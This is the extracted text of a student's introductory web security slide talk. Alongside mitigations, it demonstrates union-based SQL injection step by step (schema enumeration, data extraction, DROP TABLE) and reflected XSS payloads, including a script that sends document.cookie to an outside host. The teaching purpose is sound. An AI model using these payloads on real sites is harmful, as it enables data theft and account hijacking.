Slide 1

Slide 1 text

Introduction to Web Security YEUK HON WONG @jwxie CUNY City College

Slide 2

Slide 2 text

Code ● All code can be found in https://github.com/yeukhon/websec-poc

Slide 3

Slide 3 text

I am one of you. Undergraduate in CS. Took CSC 480 with wes in spring. Mozilla Application Security intern in summer 2013.

Slide 4

Slide 4 text

Security is hard: No shit. Developers are users too. We have the right to understand security and be aware of the state of the art.

Slide 5

Slide 5 text

BIGGER PICTURE: “World's Biggest Data Breaches & Hacks visualization” - http://www.informationisbeautiful.net/visualizations/worlds- biggest-data-breaches-hacks/

Slide 6

Slide 6 text

OWASP Top 10 Lists top 10 application security vulnerability every three years.

Slide 7

Slide 7 text

OWASP Top 10 https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

Slide 8

Slide 8 text

This talk o SQL Injection o Cross-site scripting (XSS) o Password management

Slide 9

Slide 9 text

Risks of SQL Injection ● Remains as #1 in the OWASP Top 10. ● Financial and trust loss: – Sensitive data leakage – DoDs attack (usually in form of data loss)

Slide 10

Slide 10 text

SQL injection in the news

Slide 11

Slide 11 text

How SQL injection works?

Slide 12

Slide 12 text

How SQL injection works? GET /users?id=1 GET /users?id=1 SELECT * FROM users WHERE id = 1; ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),) ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),) GET /users?id=1 GET /users?id=1 and 1=1 and 1=1 SELECT * FROM users WHERE id = 1 and 1=1; ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),) ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),) GET /users?id=1 GET /users?id=1 and 1=2 and 1=2 SELECT * FROM users WHERE id = 1 and 1=2; None None GET /users?id=1; DROP TABLE users; GET /users?id=1; DROP TABLE users; SELECT * FROM users WHERE id = 1; DROP TABLE users;

Slide 13

Slide 13 text

Complex SELECT attr1, attr2 FROM users; SELECT * FROM ranks; SELECT percentage FROM progress; In principle, some of the attrs don't have to be visible to the frontend! attr1 may never be shown to us in the frontend.

Slide 14

Slide 14 text

Basic usage of SQL Injections Attacker: 1. /users?id= is exploitable 2. Wants to steal some sensitive data from some table. (Could be a different table or the same table) Tools: 1. error-based attack, and 2. union-based attack.

Slide 15

Slide 15 text

UNION UNION combines two SQL queries into a single table of matching rows. Name Amount Alice 100 Bob 101 Name Amount Calvin 102 Derek 103 SELECT * FROM table1 SELECT * FROM table1 UNION UNION SELECT * FROM table2; SELECT * FROM table2; Name Amount Alice 100 Bob 101 Name Amount Alice 100 Bob 101 Calvin 102 Derek 103

Slide 16

Slide 16 text

Step 1: Number of attributes Attacker has to find out the number of attributes returned by the SELECT FROM ; query.The following tells us there are more than one attributes are returned. GET /users?id=1 UNION ALL SELECT 1 GET /users?id=1 UNION ALL SELECT 1 SELECT * FROM users WHERE id = 1 UNION ALL SELECT 1; 500 Internal Server Error: 500 Internal Server Error: OperationalError: (1222, 'The used SELECT statements have a different OperationalError: (1222, 'The used SELECT statements have a different number of columns') number of columns')

Slide 17

Slide 17 text

Step 1: Number of attributes Attacker has to find out the number of attributes returned by the SELECT FROM ; query.The following tells us there are more than one attributes are returned. GET /users?id=1 UNION ALL SELECT 1,2 GET /users?id=1 UNION ALL SELECT 1,2 SELECT * FROM users WHERE id = 1 UNION ALL SELECT 1,2; 500 Internal Server Error: 500 Internal Server Error: OperationalError: (1222, 'The used SELECT statements have a different OperationalError: (1222, 'The used SELECT statements have a different number of columns') number of columns')

Slide 18

Slide 18 text

Step 1: Number of attributes In this case we know there are three attributes returned. That's good enough; the attacker doesn't need to know there are exactly or more than three attributes in a table. GET /users?id=1 UNION ALL SELECT 1,2,3 GET /users?id=1 UNION ALL SELECT 1,2,3 SELECT * FROM users WHERE id = 1 UNION ALL SELECT 1,2,3; ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8') ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8')

Slide 19

Slide 19 text

Step 2: Find a table to query The attacker also doesn't know what tables are available in a database. To do this, find out the version. In this case, this is a MySQL 5.5.34 server. GET /users?id=1 UNION ALL SELECT @@version,2,3 GET /users?id=1 UNION ALL SELECT @@version,2,3 SELECT * FROM users WHERE id = 1 UNION ALL @@version 1,2,3; (('1', 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), (('1', 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), ('5.5.34-0ubuntu0.12.04.1', '2', '3')) ('5.5.34-0ubuntu0.12.04.1', '2', '3'))

Slide 20

Slide 20 text

Step 2: Find a table to query For MySQL > 5, we can do this to find tables: GET /users?id=1 UNION SELECT 1, 2, table_name FROM information_schema.tables GET /users?id=1 UNION SELECT 1, 2, table_name FROM information_schema.tables SELECT * FROM users WHERE id = 1 UNION SELECT 1,2, table_name FROM information_schema.tables; ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), (1L, '2', 'CHARACTER_SETS'), (1L, '2', 'COLLATIONS'), (1L, '2', 'CHARACTER_SETS'), (1L, '2', 'COLLATIONS'), (1L, '2', 'COLLATION_CHARACTER_SET_APPLICABILITY'), (1L, '2', 'COLLATION_CHARACTER_SET_APPLICABILITY'), ….. ….. (1L, '2', 'setup_timers'), (1L, '2', 'threads'), (1L, '2', 'exercises'), (1L, '2', 'users')) (1L, '2', 'setup_timers'), (1L, '2', 'threads'), (1L, '2', 'exercises'), (1L, '2', 'users'))

Slide 21

Slide 21 text

Step 3: Find columns in a table We are targeting at exercises, find all its columns? GET /users?id=1 UNION SELECT 1, 2, column_name FROM information_schema.columns GET /users?id=1 UNION SELECT 1, 2, column_name FROM information_schema.columns SELECT * FROM users WHERE id = 11 UNION SELECT 1, 2, column_name FROM information_schema.columns; ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), (1L, '2', 'CHARACTER_SET_NAME'), (1L, '2', 'CHARACTER_SET_NAME'), (1L, '2', 'DEFAULT_COLLATE_NAME') (1L, '2', 'DEFAULT_COLLATE_NAME') ….. ….. ((1L, '2', 'exercise_name'), (1L, '2', 'exercises')) ((1L, '2', 'exercise_name'), (1L, '2', 'exercises'))

Slide 22

Slide 22 text

Step 3: Get exercises out We know there is a second table exercises and we know some interesting columns... Bonus: imagine legitimate query never asks for the hash, we can use UNION to look for the hash :) GET /users?id=1 UNION SELECT exercise_name, null, null from exercises GET /users?id=1 UNION SELECT exercise_name, null, null from exercises UNION SELECT exercise_name, null, null from exercises; (('1', 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), (('1', 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), ('exercise_name_1', None, None)) ('exercise_name_1', None, None))

Slide 23

Slide 23 text

Mitigations ● Sanitize user inputs. Escape. ● Don't construct SQL queries by string concatenations ● If you have to, somehow, use parameterize function provided by the database driver. This is usually known as the “prepared” statement. ● Use ORM. (Rail, Django ORM, SQLAlchemy are good)

Slide 24

Slide 24 text

Cross-site scripting (XSS)

Slide 25

Slide 25 text

XSS ● XSS deals with scripting – to be exact Javascript, HTML and CSS. ● I consider this the most common, the cheapest vulnerability. – Personal, school and corporate websites are almost always vulnerable.

Slide 26

Slide 26 text

Risks of XSS ● Loading malicious code. ● Phishing attacks – Iframe attack – Clickjacking ● Redirect attack ● Cookie stealing

Slide 27

Slide 27 text

Types of XSS ● Reflected XSS – Injecting Javascript into a URL ● Stored/Persistent XSS – Injected Javascript is loaded from database ● DOM-based XSS – Rewrite DOM using either method from above

Slide 28

Slide 28 text

Reflected XSS ● Attacker injects some script (JS, HTML or CSS) and the input is reflected in the URL and in the document.

Slide 29

Slide 29 text

HTML with Reflected XSS Input

This is some h1 title

into the search bar. GET /xss?search=%3Ch1%3EThis+is+some+h1+title%3C%2Fh1%3E GET /xss?search=%3Ch1%3EThis+is+some+h1+title%3C%2Fh1%3E

Slide 30

Slide 30 text

Iframe with Reflected XSS We can create an iframe in the current document. GET /xss?search= height="100%" width="30%">

Slide 31

Slide 31 text

Redirect with Reflected XSS On loading the document we can tell the DOM to jump to another website. Attacker can create a forged login page and make victim think he or she is still on the legitimate login page. GET /xss?search=document.location.href=" GET /xss?search=<script>document.location.href="http://google.com http://google.com" "

Slide 32

Slide 32 text

Cookie Stealing with Reflected XSS Under browser's Same Origin Policy, we can make GET request. Attacker make a request to attacker's url in the background using XSS and append cookie to the request. GET /xss?search= GET /xss?search=<script> xhr=new XMLHttpRequest(); xhr=new XMLHttpRequest(); xhr.open("GET","http://192.168.33.60:8081/?cookie=" + xhr.open("GET","http://192.168.33.60:8081/?cookie=" + document.cookie,true); document.cookie,true); xhr.send(); xhr.send();

Slide 33

Slide 33 text

Stored XSS Inject code into the database, the application doesn't escape the output so browser reads the code as it is (like valid HTML). This is much more serious – imagine someone posted a comment with XSS in a bulletin board.

Slide 34

Slide 34 text

XSS Mitigations 1. Sanitize input code by means of escaping characters. For example use JSON to serialize input and output. 2. Cookies should be set to secure only flag and HTTPS only. So stealing cookies using XSS is not possible. 3. Avoid running arbitrary user code in HTML. For example, don't turn off safe string in Django's template. 4. Add Content-Security-Policy which prevents inline script and style.

Slide 35

Slide 35 text

Password

Slide 36

Slide 36 text

Hashing algorithms ● Cryptographically strong hashing algorithms ● Fast hashing vs work-factor hashing ● MD5 – broken ● SHA family (use SHA2) ● Bcrypt vs scrypt vs PBKDF2

Slide 37

Slide 37 text

Cost to break

Slide 38

Slide 38 text

Don't ask for password Even big companies get it wrong... Adopt Mozilla Persona....

Slide 39

Slide 39 text

Questions? @jwxie github.com/yeukhon speakerdeck.com/yeukhon

Slide 40

Slide 40 text

:p Thank you!